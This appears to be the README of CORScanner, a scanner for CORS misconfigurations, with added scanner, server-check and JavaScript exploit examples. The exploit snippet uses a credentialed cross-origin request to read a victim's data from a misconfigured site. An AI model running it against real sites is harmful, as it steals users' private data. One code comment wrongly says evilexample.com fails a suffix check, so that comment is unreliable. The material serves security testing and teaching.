CORScanner: Fast CORS Misconfiguration Vulnerabilities Scanner

CORScanner is a Python tool designed to discover CORS misconfiguration vulnerabilities in websites. It helps website administrators and penetration testers check whether the domains/URLs they are targeting have insecure CORS policies.


  • Fast. It uses gevent instead of Python threads for concurrency, which is much faster for network scanning.
  • Comprehensive. It covers all the common types of CORS misconfigurations we know.
  • Flexible. It supports various user-defined options (e.g. file output), which is helpful for large-scale scanning.
  • 🆕 CORScanner supports installation via pip (pip install corscanner or pip install cors)
  • 🆕 CORScanner can be used as a library in your project.

LaTeX version:

author = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},
title = {We Still Don{\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},
booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},
year = {2018},
isbn = {978-1-939133-04-5},
address = {Baltimore, MD},
pages = {1079--1093},
url = {},
publisher = {{USENIX} Association},
month = aug,

Word version:

Jianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. “We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS.” In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.


Screenshot of CORScanner


  • Download this tool
git clone
  • Install dependencies
sudo pip install -r requirements.txt

CORScanner depends on the requests, gevent, tldextract, colorama and argparse Python modules.

Python Version

  • Both Python 2 (2.7.x) and Python 3 (3.7.x) are supported.

CORScanner as a library

  • Install CORScanner via pip
sudo pip install corscanner

or use the short name:

sudo pip install cors
  • Example code:
>>> from CORScanner.cors_scan import cors_check
>>> ret = cors_check("", None)
>>> ret
{'url': '', 'type': 'reflect_origin', 'credentials': 'false', 'origin': '', 'status_code': 200}

You can also use CORScanner via the corscanner or cors command:

cors -vu


Short Form  Long Form   Description
-u          --url       URL/domain to check its CORS policy
-d          --headers   Add headers to the request
-i          --input     URL/domain list file to check their CORS policy
-t          --threads   Number of threads to use for the CORS scan
-o          --output    Save the results to a JSON file
-v          --verbose   Enable verbose mode and display results in real time
-T          --timeout   Set the requests timeout (default 10 sec)
-p          --proxy     Enable a proxy (http or socks5)
-h          --help      Show the help message and exit


  • To check the CORS misconfigurations of a specific domain:
python -u
  • To enable more debug info, use -v:
python -u -v
  • To save scan results to a JSON file, use -o:
python -u -o output_filename
  • To check the CORS misconfigurations of a specific URL:
python -u
  • To check CORS misconfigurations with specific request headers (for example a session cookie, so that authenticated responses are tested):
python -u -d "Cookie: test"
  • To check the CORS misconfigurations of multiple domains/URLs:
python -i top_100_domains.txt -t 100
  • To enable a proxy for CORScanner, use -p:
python -u -p
  • To use a socks5 proxy, install PySocks with pip install PySocks:
python -u -p socks5://
  • To list all the basic options and switches, use the -h switch:
python -h

Misconfiguration types

This tool covers the following misconfiguration types:

Misconfiguration type      Description
Reflect_any_origin         Blindly reflects the Origin header value in the Access-Control-Allow-Origin response header, so any website can read its secrets by sending cross-origin requests.
Prefix_match               The site trusts any origin whose hostname begins with its own name (e.g. www.example.com trusts example.com.evil.com), which is an attacker's domain.
Suffix_match               The site trusts any origin whose hostname ends with its own name (e.g. www.example.com trusts evilexample.com), which could be registered by an attacker.
Not_escape_dot             An unescaped "." in the origin-matching regex matches any character (e.g. www.example.com trusts wwwaexample.com), which could be registered by an attacker.
Substring_match            The site trusts any origin containing its name as a substring (e.g. www.example.com trusts example.co), which could be registered by an attacker.
Trust_null                 The site trusts the null origin, which can be forged by scripts in a sandboxed iframe.
HTTPS_trust_HTTP           Risky trust dependency: an HTTPS site trusts its own HTTP origin, so a MITM attacker may steal HTTPS site secrets.
Trust_any_subdomain        Risky trust dependency: every subdomain is trusted, so an XSS on any subdomain may steal its secrets.
Custom_third_parties       Custom unsafe third-party origins; see the origins.json file for the list. Thanks @phackt!
Special_characters_bypass  Exploiting browsers' handling of special characters in the Origin header. Most only work in Safari except _, which also works in Chrome and Firefox. See Advanced CORS Exploitation Techniques. Thanks @Malayke.
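The checks in the table above, as an added example that is not CORScanner's own code: the script builds the Origin header a scanner would send for each misconfiguration type and classifies the Access-Control-Allow-Origin / Access-Control-Allow-Credentials headers that come back. Network I/O is replaced by a fetch(url, origin) callback, and the servers at the bottom are constructed stand-ins for common buggy origin checks, not real hosts. evil.example is an assumed attacker-controlled domain, and apart from reflect_origin (which appears in the library output above) the lowercase type names are assumptions that mirror the table's rows.

```python
"""Probe-and-classify logic of a CORS misconfiguration scan (added example).

This is not CORScanner's own code. It builds the Origin values a scanner would
send for one target URL and classifies the Access-Control-Allow-* headers that
come back. Network I/O is replaced by a caller-supplied fetch(url, origin)
function, and the servers below are constructed stand-ins, not real hosts.
"""
from urllib.parse import urlparse

# Assumed attacker-registered domain (.example is reserved by RFC 6761).
ATTACKER = "evil.example"


def build_probes(target_url):
    """Return an ordered list of (misconfiguration_type, Origin to send) pairs."""
    parsed = urlparse(target_url)
    scheme, host = parsed.scheme, parsed.hostname
    probes = [
        ("reflect_origin", f"{scheme}://{ATTACKER}"),                  # unrelated origin
        ("prefix_match", f"{scheme}://{host}.{ATTACKER}"),             # target name as a prefix
        ("suffix_match", f"{scheme}://evil{host}"),                    # target name as a suffix, no dot boundary
        ("not_escape_dot", f"{scheme}://{host.replace('.', 'a', 1)}"),  # '.' in a regex matches any char
        ("substring_match", f"{scheme}://{host[:-1]}"),                # e.g. example.co for example.com
        ("trust_null", "null"),                                        # origin of a sandboxed iframe
        ("trust_any_subdomain", f"{scheme}://evil.{host}"),            # an XSS on any subdomain suffices
    ]
    if scheme == "https":
        probes.append(("https_trust_http", f"http://{host}"))          # a MITM can forge an http origin
    return probes


def classify(probe_type, sent_origin, headers):
    """Return a finding if the response grants cross-origin read access to sent_origin."""
    acao = headers.get("Access-Control-Allow-Origin")
    creds = headers.get("Access-Control-Allow-Credentials", "").strip().lower() == "true"
    if acao is None:
        return None
    if acao == "*":
        # Browsers refuse '*' together with credentials, and without credentials
        # only public data is readable, so a wildcard is not reported here.
        return None
    if acao == sent_origin:
        return {"type": probe_type, "origin": sent_origin, "credentials": creds}
    return None


def scan(target_url, fetch):
    """Send each probe through fetch(url, origin) -> headers and report the first hit."""
    for probe_type, origin in build_probes(target_url):
        finding = classify(probe_type, origin, fetch(target_url, origin))
        if finding:
            finding["url"] = target_url
            return finding
    return None


def make_server(is_trusted):
    """Constructed backend: reflects Origin with credentials when is_trusted(origin) holds."""
    def fetch(url, origin):
        if origin is not None and is_trusted(origin):
            return {"Access-Control-Allow-Origin": origin,
                    "Access-Control-Allow-Credentials": "true"}
        return {}
    return fetch


# Typical buggy origin checks, each modelled as a constructed server (no real host involved).
REFLECT_SERVER = make_server(lambda o: True)
PREFIX_SERVER = make_server(lambda o: o.startswith("https://www.example.com"))
SUFFIX_SERVER = make_server(lambda o: o.endswith("example.com"))
SAFE_SERVER = make_server(lambda o: o == "https://www.example.com")

if __name__ == "__main__":
    for name, server in [("reflect", REFLECT_SERVER), ("prefix", PREFIX_SERVER),
                         ("suffix", SUFFIX_SERVER), ("safe", SAFE_SERVER)]:
        print(name, scan("https://www.example.com", server))
```

Probe order matters: a server that reflects every Origin would also satisfy the prefix and suffix probes, so the unrelated origin is tried first and the scan stops at the first hit, which is why one type per URL comes back. A wildcard Access-Control-Allow-Origin: * is deliberately not reported, because browsers refuse to pair it with credentials; in a real scan the request should also carry the victim's session cookie (the -d option above), since many applications only emit CORS headers on authenticated responses.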

Exploitation examples

Here is an example of how to exploit the "Reflect_any_origin" misconfiguration on a vulnerable site; localhost is the malicious website in the video. Demo video on YouTube:

Here is the exploitation code:

    // Send a cross-origin request to the server when a victim visits the page.
    // The vulnerable endpoint URL is omitted on this page; put it in the empty string.
    var req = new XMLHttpRequest();
    req.open('GET', "", true);
    req.onload = stealData;
    req.withCredentials = true;   // attach the victim's cookies to the request
    req.send();

    function stealData(){
        // Reading the response is allowed because of the CORS misconfiguration.
        var data = JSON.stringify(JSON.parse(this.responseText), null, 2);

        // Display the data on the page. A real attacker would send the data to his server.
        output(data);
    }

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;
    }

If you have understood how the demo works, read Section 5 and Section 6 of the CORS paper to learn how to exploit the other misconfigurations.
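The server-side counterpart, as an added example that is not part of the page or of CORScanner: the vulnerable function reproduces the endswith() and null-origin checks behind the Suffix_match and Trust_null rows, and the hardened one is the exact-match allow-list that closes every row of the misconfiguration table except what you choose to put in the list (the Custom_third_parties row is about that choice). The allow-list entries and the test origins are constructed for illustration.

```python
"""Vulnerable and hardened origin checks for a credentialed API (added example).

Not CORScanner's code. Both functions take the request's Origin header value
(None when absent) and return the CORS response headers the server should
emit. The allow-list below is constructed for illustration.
"""
from urllib.parse import urlsplit

ALLOWED_ORIGINS = frozenset({
    "https://www.example.com",
    "https://app.example.com",
})


def cors_headers_vulnerable(origin):
    """String suffix match: the bug CORScanner reports as Suffix_match (and Trust_null)."""
    if origin is None:
        return {}
    # evilexample.com and example.com.evil.example do not pass, but evilexample.com
    # is registrable by anyone and 'null' is forgeable from a sandboxed iframe.
    if origin.endswith("example.com") or origin == "null":
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}


def cors_headers_hardened(origin):
    """Exact match of scheme://host[:port] against a fixed allow-list."""
    if origin is None or origin == "null":
        return {}
    parts = urlsplit(origin)
    # An Origin is only scheme://host[:port]; anything with a path, query or
    # userinfo is malformed, and only https origins may read credentialed data.
    if (parts.scheme != "https" or not parts.netloc or parts.path
            or parts.query or parts.fragment or parts.username):
        return {}
    normalised = f"{parts.scheme}://{parts.netloc.lower()}"
    if normalised not in ALLOWED_ORIGINS:
        return {}
    return {"Access-Control-Allow-Origin": normalised,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


if __name__ == "__main__":
    for o in ["https://www.example.com", "https://evilexample.com",
              "https://www.example.com.evil.example", "null", "http://www.example.com"]:
        print(o, cors_headers_vulnerable(o), cors_headers_hardened(o))
```

Vary: Origin is emitted in both cases on purpose: without it a shared cache may store the Access-Control-Allow-Origin computed for one requester and replay it to another, which turns even a correct allow-list into a reflection bug for cached responses.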
